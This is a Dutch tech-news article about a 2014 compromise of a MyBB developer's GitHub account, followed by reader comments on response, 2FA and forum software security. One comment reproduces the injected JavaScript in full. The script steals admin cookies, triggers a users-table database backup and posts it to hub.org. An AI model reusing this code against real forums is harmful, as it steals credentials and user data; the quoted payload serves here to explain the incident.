Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 47 reacties
Submitter: WhatsappHack

Een developer van myBB waarschuwt beheerders die de de opensource-forumsoftware gebruiken voor mogelijke hackaanvallen. De waarschuwing volgt nadat het GitHub-account van de myBB-ontwikkelaar is gekraakt en er wijzigingen in de broncode zijn aangebracht.

myBBMyBB-ontwikkelaar 'Pirata Nervo' meldt op de website van de forumsoftware dat zijn GitHub-account onlangs is gekraakt. De aanvaller zou kans hebben gezien om, na te zijn ingelogd op GitHub, in de broncode van de opensource-forumsoftware wijzigingen aan te brengen.

Het zou gaan om kwaadaardige code waarmee de forumsoftware controleert of er updates beschikbaar zijn. De hacker heeft javascript-code geïnjecteerd waarmee back-ups van myBB-databases buitgemaakt kunnen worden.

Volgens Pirata Nervo heeft de aanvaller circa 16,5 uur toegang gehad tot zijn account. De ontwikkelaar waarschuwt websitebeheerders die myBB gebruiken om te controleren of zij mogelijk slachtoffer zijn geworden van de hacker. Daarbij moet met name gekeken worden naar de datum en tijd van de automatische back-up-functie van myBB.

Moderatie-faq Wijzig weergave

Reacties (47)

Hier zie je de commit die is gedaan:
https://github.com/mybb/m...16cf220a7243031234d264716

En de code die op hub.org/analytics.php staat:
document.getElementsByClassName('error')[0].style.display = 'none';


function runStuff() {
jQuery.noConflict();
jQuery.post('http://hub.org/analytics.php', { path: document.location.href, cookie: document.cookie }, null, 'text');


jQuery.get('index.php?module=tools-backupdb&action=backup', function(data) {
var table = jQuery(data).find('#table_select option[value$="users"]:not([value*="tapatalk"])').val();
var post_key = jQuery(data).find('input[name="my_post_key"]').val();
jQuery.post('index.php?module=tools-backupdb&action=backup', { my_post_key: post_key, tables: [ table ], filetype: 'plain', method: 'download', contents: 'data', analyzeoptimize: 0 }, function(data) {
jQuery.post('http://hub.org/analytics.php', { path: document.location.href, cookie: document.cookie, db: data }, null, 'text');
}, 'text');
});

}

if (typeof jQuery === 'undefined') {
var jq = document.createElement('script');
jq.src = 'http://code.jquery.com/jquery.js';
jq.onload = runStuff;
document.body.appendChild(jq);
} else {
runStuff();
}

[Reactie gewijzigd door Nordlys op 16 november 2014 12:54]

Als ik het goed lees probeert het dus een backup van je database te maken op het moment dat mybb controleert op een nieuwe versie en deze vervolgens naar een hub.org domein te sturen.

[Reactie gewijzigd door CurlyMo op 16 november 2014 13:02]

Wat ik mij dan afvraag zou het mogelijk zijn om hub.org een mail te sturen en daar duidelijk te maken dat een kwaadaardig persoon gebruik maakt van hun diensten: Reageren ze niet en dit gebeurt vaak bij meerdere gebeurtenissen dat de providers dan bijvoorbeeld hub.org gaan blocken en zo van internet buitensluiten?! Zo dat technisch en ethisch mogelijk zijn?
Ethisch is het sowieso mogelijk om hub.org hierom te blokkeren.
Sterker nog, ik denk dat eerst blokkeren, dan waarschuwen, de juiste gang van zaken is. Wanneer ze het probleem dan opgelost hebben, deblokkeren.
Neen, dat is een hele slechte gang van zaken.
Dat er misbruik gemaakt wordt kan nu eenmaal gebeuren. Men had ook een .js op een direct dropbox link kunnen gooien bijvoorbeeld, of het in een plaatje verstoppen, en zo zijn er nog tig opties.

Gewoon abuse melding maken, wachten op oplossing, klaar.
Het schiet niet op om meteen te blocken, zo'n hackert pakt dan wel weer een ander domein.
En het punt is eigenlijk dat de software dit probleem zou hebben moeten opvangen... Design flaw. Moet je geen andere slachtoffers voor gaan straffen. ;)

Een ISP kan sowieso meestal niet zomaar zo'n site offline gooien trouwens, tenzij ze op shared hosting staan wellicht...
Waarom zouden ze dat niet kunnen? Switchpoort null-routen en klaar?
Waarom zouden ze dat niet kunnen? Switchpoort null-routen en klaar?
en de woede van de andere <x> klanten op die machine op je nek halen? nee. daar zijn procedures voor vanuit de industrie.

ISP A krijgt bericht, die bericht zijn klant B (eigenaar doos), die pakt het verder op met zijn klant C. Zomaar B offline rammen en daarmee niet alleen klant C offline halen, maar ook D t/m ZZZ, is bijzonder kwalijk.
Uh, waarom ga je andere klanten offline halen? Elke klant heeft toch z'n eigen switchpoort 8)7 of ga je al je klanten op een poort aansluiten? Bij abuse: eerst blackholen, daarna vragen stellen. Dat is de policy, en zo wordt ie ook uitgevoerd.
Uh, waarom ga je andere klanten offline halen? Elke klant heeft toch z'n eigen switchpoort 8)7 of ga je al je klanten op een poort aansluiten? Bij abuse: eerst blackholen, daarna vragen stellen. Dat is de policy, en zo wordt ie ook uitgevoerd.
Wel eens van Vmware ESX of andere cloud toepassingen gehoord? :)

Dan doe je met een (serie,het zijn er doorgaans meer dan 1) switchpoort killen een hoop kwaad. Ik ga echt geen complete hostingprovider offline halen omdat hij 1 enkele klant heeft met een lekke drupal.
Bij Vmware kan je de virtuele machine toch platgooien :?
Bij Vmware kan je de virtuele machine toch platgooien :?
Tuurlijk, en daarmee 200 klanten van een klant benadelen omdat er eentje een lekke plugin heeft? kom op zeg.

Als we zelf toegang hebben tot de server ruimen we de zaak onmiddelijk op, maar dat is niet altijd het geval. Maar om dan 200 bedrijven te benadelen, dat is een veel te zware actie, alleen in zeer uitzonderlijke/ernstige gevallen gaan we daar toe over.
Wel eens van vSwitches, Open vSwitch, OpenFlow, brctl en virsh gehoord? ;) Dat zijn ook gewoon (virtuele) switches met switchpoorten, en die zitten als het goed is in je infrastructuur net zo goed achter een 'switchpoort uitzetten' knopje. Wat dacht je dan? Dat ik bedoelde dat je een managed hypervisor maar even uit de lucht moest trekken?
Gezien het feit dat Hub.org zichzelf profileert als Offshore VPS host, hebben die vaak privacy hoog in het vaandel staan en kan de inhoud van wat er gehost wordt zeer variëren.
Ik vermoed niet dat Hub.org dus überhaupt zou reageren, maar dat zijn just my 2 cents.
Wat het artikel vergeet te vermelden is dat dit alleen van toepassing op 1.8.x versie.
Ook de site van MyBB laat dit helaas na..

1.6.x gebruikers zijn niet geraakt door dit lek.
Daarom raad ik gebruikers altijd even aan om te blijven hangen op een vorige release tenzij het security fixes zijn

[Reactie gewijzigd door Dennisb1 op 17 november 2014 01:16]

Maar het had even goed ook in die oudere versie kunnen zitten... En dan had blijven hangen je echt helemaal niets opgeleverd.

Op een oudere versie blijven zitten is dus totaal geen oplossing, alleen "in hindsight" is niet upgraden hier dus gewoon pure mazzel geweest... Achteraf praten is altijd zo lekker makkelijk. ;) Zegt totaal niet dat niet upgraden good practice is ofzo. Het had ook zo kunnen zijn dat enkel 1.6 vatbaar was en 1.8 door redesign niet. En dan zit jij daar met je niet geupgrade installatie omdat je dacht dat dat beter was... Nu komt t toevallig goed uit, de volgende keer pakt het andersom uit.

Nee sorry, niet upgraden vind ik een onzin "oplossing" en is niet aan te raden uit een false sense of security oogpunt. Het is nu niets meer dan pure mazzel als je niet geupgrade had. Niets meer, niets minder.

Bedenk wel dat dit namelijk enkel mogelijk was door die github kraak. Dat had dus naar elke versie kunnen doorsijpelen als ze t zelfde mechanisme voor updates gebruikten... Wel of niet upgraden is dan niet eens relevant. Puur achteraf captain hindsight ge*** :P

[Reactie gewijzigd door WhatsappHack op 17 november 2014 08:58]

Dan doe je toch gewoon een reverse commit en klaar? :o
Kun je doen. En morgen weer, en overmorgen nog een keer. Totdat al je gebruikers overgestapt zijn op een andere dienst omdat je niet meer te vertrouwen bent.
Na het lezen van het bron artikel is mij het volgende duidelijk geworden

1) MyBB gebruikt in zijn software github als update mechanisme, er wordt dus door een MyBB installatie een call gedaan NAAR een github pagina om te kijken of er een nieuwe versie beschikbaar is
2) De hacker heeft een nieuwe versie op github gezet die hem in staat stelt om van ALLE MyBB installaties een back up te maken
3) de ontwikkelaar had geen two-factor auth aanstaan.

Dus inderdaad is het niet zo simpel als alleen een reverse commit doen maar het zou niet verkeerd zijn.

Natuurlijk moet je op github gewoon altijd two-factor auth aanzetten, dan gebeurt dit soort shit niet.
MyBB doet niet een call naar GitHub, maar naar de website van MyBB (http://www.mybb.com/version_check.php). Die geeft XML terug en die wordt gewoon teruggegeven aan de gebruiker zonder check (https://github.com/mybb/m...in/modules/home/index.php).
Klopt, en dat zal ook gedaan worden, maar in de tussentijd zijn er wel mogelijk mensen geweest die de aangepaste code gebruikt hebben voor hun build, en daarom moeten die dus wel gewaarschuwd worden.. Als jij weet dat jij in die tijd geen code hebt binnengehaald en hebt gebruikt hoef je je ook nergens zorgen om te maken...
Ik ben benieuwd hoe het github account is gehacked iemand info daar over ?
Heel simpel. Gewoon zelfde accountnaam/emailadres/password op andere site gebruikt? Of malware op zijn machine? Of op 10-tallen andere methodieken waarmee je password/login kan onderscheppen. Zo iets is vrij simpel zonder 2-factor authenticatie.
Klinkt niet echt als een hack, volgens mij is gewoon zijn password achterhaald buiten github om.
Omdat hij geen 2 factor authentication gebruikte kon de cracker vervolgens zelf dingen aanpassen.
Zo zie je maar weer dat Two Factor Authentication er niet voor niets is. Zeker bij een dienst als Github waarbij mensen op jouw naam vertrouwen kan het levensgevaarlijk zijn wanneer iemand anders toegang tot jouw account heeft.
two factor authentication is nog steeds geen zekerheid...
Correct, want de server van Github kan ook worden betreden door mensen die andere intenties hebben dan de gemiddelde open source aanhanger.

Of de computer waarmee wordt ingelogd door de gebruiker van Github.

We moeten even wachten op nieuws: Wetenschappers versturen kwantuminformatie naar meer dan één ontvanger

a=b en er is niemand tussen a en b om dit te onderscheppen.
Een uiterst kwalijke zaak en bewijst maar weer eens dat 2FA zo langzamerhand verplicht gesteld moet gaan worden voor dat soort sites. Deze aktie beschaamt de developer en zou zelfs de developer een naam kunnen geven als onbetrouwbaar wat de verdere ontwikkeling van software in gevaar zou kunnen brengen (de bekende handdoek in de ring).
Ik vind dit wel een groot beveiligingslek bij MyBB ...

Blijkbaar worden de aanpassingen op GitHub op de website van MyBB doorgevoerd zonder te controleren op gekke dingen. En de call die MyBB doet naar de server van MyBB wordt gewoon doorgegeven naar de gebruiker zonder eerst afgevangen te worden. Daar hebben ze nu wel een issue voor aangemaakt (https://github.com/mybb/mybb/issues/1617).
Ik vraag mij af ik draai MYBB en die vraagt om een update MyBB 1.8.2 (1802).

kan ik dit nu veilig doen of toch nog maar even wachten ?
De commit is reversed en ze waren bezig met een patch. Upgraden moet gewoon veilig kunnen nu.

Je moet wel de instructies volgen en even controleren of je databeest niet gejat is.
Gecontroleerd en niet gejat.

Thnx voor de Response :)
Gelukkig is er phpBB3.x ;)
Alsof die wel 100% veilig is. Ook phpBB heeft zijn gloriedagen wel gehad, en is lang zo poulair niet meer.
Lijkt erop alsof al die ontwikkelaars van gratis forumsoftware geen zin meer hebben om door te ontwikkelen.
phpBB duurde vrij lang voor een sumiere update
myBB zelfde als phpBB
smf, hoe lang wachten ze daar al op een update naar 2.1
en zo kan ik wel even doorgaan.
Maarja, aan de andere kant kun je ook stellen, waarom door ontwikkelen als wat er staat al perfect werkt..
Maar dat is gewoon een algemeen probleem met 'gratis'/'open source' projecten, de kans is altijd aanwezig dat ontwikkelaars er geen zin meer in hebben..

Maar je kunt dan ook stellen, omdat het 'open source' is, heb je hun toch niet nodig, dus als het je te lang duurt ga je toch zelf met de source aan de slag............
Mee eens. Feit is wel, dat er voor zowel phpBB, myBB, en smf vele devvers zijn die gewoon door zullen gaan gelukkig.. Dus ik zie die niet ineens stoppen ;)
SMF heeft er altijd heel erg lang over gedaan om nieuwe versies te produceren. Gaan altijd jaren overheen.
Maar als t dan klaar is, dan staat er ook een zeer veilig en extreem stabiel product klaar. :)

Ik persoonlijk vind dat prettiger dan dat "rolling release" achtige gelazer waarbij iedereen maar snel, snel, snel wil releasen ongeacht of het uitgebreid getest en getweaked is...
Maar ieder z'n ding; er is geen "beste software" of "beste methode", er is enkel "het beste voor mij"; en die afweging is voor iedereen anders.

SMF 2.1 komt trouwens zeer binnenkort uit.
Kwestie van dagen gok ik.
Mee eens. Heb zelf SMF heel lang gebruikt, en het werkte dan ook gewoon altijd goed.
Waar heb je die info vandaan dat 2.1 zeer binnenkort uitkomt? Kan het zo 1 2 3 niet vinden. Heb wel zin om SMF 2.1 te gaan proberen :)
Intern. Is intussen released. :) (Beta)
Inderdaad. Ben er nu 2 dagen mee aan het "spelen" en het zit wederom goed in elkaar. Keurig :)
phpBB is in t verleden ook vaak in de problemen gekomen...

De veiligste gratis software voor communities is Simple Machines Forum (SMF). Onverslaanbaar in security track record, nog nooit werkelijk "severe" gaten gehad, enkel wat random onzin of waarvoor je sowieso al administrator toegang moest hebben om iets voor elkaar te krijgen...

De veiligste betaalde software voor communities is XenForo. Die heeft nagenoeg wellicht zelfs nog een nét iets betere trackrecord met aantal CSV's en severity scores dan SMF.

Met enig van die 2 stukken software kan je echter nooit mis zitten als je zeer veilige software wilt hebben voor je site. myBB en phpBB kunnen geen van beiden tippen aan SMF noch XF als t op beveiliging aankomt.
Voor mij voldoet phpbb 3.x. Ik heb nog geen hacks of andere onoverkomenlijke vervelende zaken bij de hand gehad. Mocht dat niet meer zo zijn dan zal ik in elk geval je suggestie meenemen.
Waar net pas de mogelijkheid is toegevoegd om plugins makkelijk te installeren? No thanks ...
En niet alles automatisch updaten :-)
Inderdaad. Dit is een instelling die veel beginnelingen gebruiken binnen Installatron. Wele ik zelf altijd af zou raden
Ja, dat dacht die hacker dus ook...

Sorry, maar ik zie niet in hoe die tip hier relevant is... De besmette sites zijn namelijk niet gesloopt, enkel de data is gejat. Als je zelf ook een backup hebt maakt dat nog steeds totaal geen verschil, dus hoe heeft een backup maken hier enig nut/effect...? Hoe is het uberhaupt relevant? Behalve voor de hacker dan natuurlijk, die is blij met zijn gestolen backups.
Wat? Liggen mijn persoonsgegevens op straat? Geeft niets, ik heb toch een backup. 8)7

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True